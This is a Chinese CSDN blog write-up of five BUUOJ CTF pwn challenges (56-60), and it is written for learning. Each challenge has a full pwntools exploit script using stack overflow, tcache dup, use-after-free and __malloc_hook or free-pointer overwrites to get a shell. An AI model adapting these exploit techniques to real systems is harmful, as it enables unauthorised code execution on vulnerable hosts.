buuoj Pwn writeup 56-60

最新推荐文章于 2023-05-18 20:37:07 发布
最新推荐文章于 2023-05-18 20:37:07 发布
阅读量234 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113800628
版权
一系列CTF挑战的解决方案,涉及栈溢出、tcache攻击、UAF漏洞利用。通过修改内存管理结构,如tcache,将free替换为system函数,实现远程命令执行。利用点包括libc版本的特性,如2.27的tcache,以及特定函数地址泄露。
摘要由CSDN通过智能技术生成

56 wustctf2020_getshell

保护

在这里插入图片描述在这里插入图片描述在这里插入图片描述
平平无奇栈溢出。

from pwn import*

r=remote('node3.buuoj.cn',26438)

system_addr=0x804851B

payload='a' * 0x1c + p32(system_addr)

r.sendline(payload)

r.interactive()

57 [V&N2020 公开赛]easyTHeap

保护

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
最多七个。

add
在这里插入图片描述在这里插入图片描述202080地址。
202060大小。

edit
在这里插入图片描述

show
在这里插入图片描述delete
在这里插入图片描述大小设置成了0但是指针还在。

在这里插入图片描述
他这个delete有意思,最多删三个。

那说来说去漏洞就uaf了,还有tcache dup。

这道题libc是2.27,引入了tcache。

tcache

整个利用方式就是说
1、首先通过tcache dup的方式攻击tcache的那个结构体,目的是什么呢,因为我们需要通过unsorted bin 去泄露地址,但是只能申请7个,根本申请不到unsorted chunk,就必须得先攻击结构体,把里面计数的地方改成大于7的数字。
2、然后tcache那个结构体现在是释放状态,可以去把那一块申请回去,进行修改,把0x60那个bins的地址填成realloc_hook,然后再申请一下就申请到了。

exp

# -*- coding: utf-8 -*-
from pwn import *

context(arch='amd64', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
#r = remote('node3.buuoj.cn', 28793)
r = process('./57')
libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
elf=ELF("./57")

def add(size):
    r.recvuntil('choice: ')
    r.sendline('1')
    r.recvuntil('size?')
    r.sendline(str(size))
    r.recvuntil("Done!\n")
    
def edit(index,data):
    r.recvuntil('choice: ')
    r.sendline('2')
    r.recvuntil('idx?')
    r.sendline(str(index))
    r.recvuntil('content:')
    r.send(data)

def show(index):
    r.recvuntil('choice: ')
    r.sendline('3')
    r.recvuntil('idx?')
    r.sendline(str(index))

def delete(index):
    r.recvuntil('choice: ')
    r.sendline('4')
    r.recvuntil('idx?')
    r.sendline(str(index))
    r.recvuntil("Done!\n")

one_gadget = 0x4f322

add(0x50)#0
delete(0)
delete(0)

show(0)
tache_chunk=u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))-0x250

print hex(tache_chunk)

add(0x50)#1
edit(1,p64(tache_chunk))

add(0x50)#2
add(0x50)#3
edit(3,'a'*0x28)

delete(3)

show(3)

libc_base=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0

one_gadget += libc_base
realloc_addr=libc_base+libc.symbols['__libc_realloc']
malloc_hook=libc_base+libc.symbols['__malloc_hook']

print hex(malloc_hook)

gdb.attach(r)
add(0x100)#4 -> tcache struct
edit(4, 'b' * 0x60 +  p64(malloc_hook - 8))
# gdb.attach(p)
add(0x50)
edit(5, p64(one_gadget) + p64(realloc_addr + 8))

add(0x10)

r.interactive()

58 xdctf2015_pwn200

保护

在这里插入图片描述在这里插入图片描述
平平无奇栈溢出。

from pwn import *

context.log_level = 'debug'

sh = remote('node3.buuoj.cn',28463)
elf = ELF('./58')
libc = ELF('./32/libc-2.23.so')

payload = 112 * 'a'
payload += p32(elf.plt['write'])
payload += p32(elf.symbols['main'])
payload += p32(1)
payload += p32(elf.got['write'])
payload += p32(4)

sh.sendline(payload)
write_addr = u32(sh.recvuntil('\xf7')[-4:])
libcbase = write_addr - libc.symbols['write']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()

payload = 112 * 'a'
payload += p32(system)
payload += p32(0xdeadbeef)
payload += p32(binsh)

sh.sendline(payload)

sh.interactive()

59 ciscn_2019_n_3

保护

在这里插入图片描述add
在这里插入图片描述
在这里插入图片描述
del
在这里插入图片描述show
在这里插入图片描述
del跟show都是调用的刚刚存在一次的那些函数。

在这里插入图片描述
在这里插入图片描述
两个free都没有清空野指针,就造成了uaf。

但是跟一般的uaf又不一样,这个uaf没有写函数。

通过uaf把free改成system函数,然后调用free("/bin/sh")
考虑没有检查double free,所以比较简单,申请两个0xc然后再释放掉,再申请到一起就可以控制一个第一层的chunk,从而修改free。

exp

# -*- coding: utf-8 -*-
from pwn import *

context(arch='amd64', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
r = remote('node3.buuoj.cn', 29362)
#r = process('./59')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./59")


#fgets最后必须用换行符截断。
def new1(index):
    r.recvuntil('CNote > ')
    r.sendline('1')
    r.recvuntil('Index > ')
    r.sendline(str(index))
    r.recvuntil('Type > ')
    r.sendline('1')
    r.recvuntil('Value > ')
    r.sendline("1")

def new2(index, length, value):
    r.recvuntil('CNote > ')
    r.sendline('1')
    r.recvuntil('Index > ')
    r.sendline(str(index))
    r.recvuntil('Type > ')
    r.sendline('2')
    r.recvuntil('Length > ')
    r.sendline(str(length))
    r.recvuntil('Value > ')
    r.sendline(value)
        
def dele(index):
    r.recvuntil('CNote > ')
    r.sendline('2')
    r.recvuntil('Index > ')
    r.sendline(str(index))

def show(index):
    r.recvuntil('CNote > ')
    r.sendline('3')
    r.recvuntil('Index > ')
    r.sendline(str(index))
    
new1(0)
new2(1, 0x20, 'a')
dele(1)
dele(0)
#gdb.attach(r)
new2(2, 0xc, "sh\x00\x00" + p32(elf.sym['system']))
new2(3, 0x20, "/bin/sh\x00")
dele(1)
r.interactive()

#最后的/bin/sh不能写在value里面,因为system函数地址后面必会有一个\n,他会让你的value的chunk的地址改掉,所以只能写在printf函数的地方。

60 bbys_tu_2016

保护

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

平平无奇栈溢出。

要注意的是它main函数的参数又是三个,所以在溢出的时候要多溢出0x8,因为是32位的嘛。

from pwn import*

r=remote('node3.buuoj.cn',28836)

system_addr=0x804856d
payload='a' * 0x18 + p32(system_addr)

r.sendline(payload)

r.interactive()
yongbaoii
关注
专栏目录
BUUOJ PWN 61-80
2h4ox1n9
12-17 260
61\
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 325
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 285
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
buuoj Pwn writeup 76-80
yongbaoii的博客
02-24 420
76 0ctf_2017_babyheap 保护 菜单堆。 allocate 堆的结构很明显了。要注意的是flag是四个字节。 fill 又是输入大小可以随便写。 又可以溢出。 free free的还是很干净的。 dump 平平无奇输出函数。 那么我们首先要考虑泄露libc的地址。泄露地址的方法只能去考虑unsorted bin,因为有溢出,可以完全仿照off by one,来制造overlapping,然后泄露地址啊,攻击malloc_hook,就下来了。 先来申请四个chunk。然后通过栈溢出改变c
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
buuoj helloword writeup
m0_73605862的博客
05-18 150
Step2:在com.example.helloworld文件目录下的smail下的com下的example下的helloword里面有MainActivity文件,点击进去发现flag。Step1:apk是安卓程序的后缀,所以这道题要用安卓的逆向工具apkIDE改之理,将程序用apkIDE打开。【来源】(buuoj)https://buuoj.cn/challenges#helloword。【思路】用apkide进行逆向分析。【题目】helloword。【题型】Reverse。
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 923
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
buuoj Pwn writeup 216-220
yongbaoii的博客
08-31 477
216 hwb2018_gettingstart 溢出覆盖就好,唯一有个浮点数,网上网站一大把,找一个转换一下就好。 exp from pwn import * context(log_level='debug') r=remote("node4.buuoj.cn","25539") r.recv() v7=0x7FFFFFFFFFFFFFFF v8=0x3FB999999999999A payload='a'*0x18+p64(v7)+p64(v8) r.send(payload) r.
buuoj Pwn writeup 156-160
yongbaoii的博客
05-28 406
156 就是64位orw的shellcode 说的很明白 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" context.arch = "amd64" r = remote("node3.buuoj.cn",29063) #r = process("./pwnn") shellcode = shellcraft.open('./flag') shellcode += shellcraft.read(3,0x4
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 248
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuoj Pwn writeup 51-55
yongbaoii的博客
02-16 276
51 cmcc_simplerop 保护 52 pwnable_orw 保护 53 jarvisoj_level1 保护 54 roarctf_2019_easy_pwn 保护 这个全绿有点厉害。 55 picoctf_2018_buffer overflow 2 保护
buuoj Pwn writeup 21-30
yongbaoii的博客
02-05 1261
21 ciscn_2019_ne_5 保护 这个地方的strcpy函数,一看就估摸着有问题。 他把src那块的东西复制到了dest 但是你会发现 dest那里 0x48 但是你是可以往src那里输入东西的。 一口气能输128个字节,那这就造成了溢出。 那再说怎么利用 这个地方首先要注意他这里没有/bin/sh,但是有sh 而且还非常隐蔽 所以呢咱们这边推荐之后/bin/sh跟sh的搜索都用ROPgadget。 非常的nice 然后程序里面本来就有system函数,然后就一把梭。 exp from p
buuoj Pwn writeup 31-40
yongbaoii的博客
02-06 1440
31 [Black Watch 入群题]PWN 这个题有问题,就给了个附件,给的链接nc都连不上,做做题算了。 保护 可以往bss上写东西,然后有个溢出,但是溢出有限,只能覆盖到返回地址。 因为开了NX,所以不能写shellcode,因为溢出有限,所以先想到的是栈迁移。 把栈迁移到bss上,构造ROP,通过write函数泄露libc地址,然后就在bss上一把梭。 写法很多,我这里的话就直接先把’/bin/sh\x00’先写在了bss的位置。 exp from pwn import* from LibcSea
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 234
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值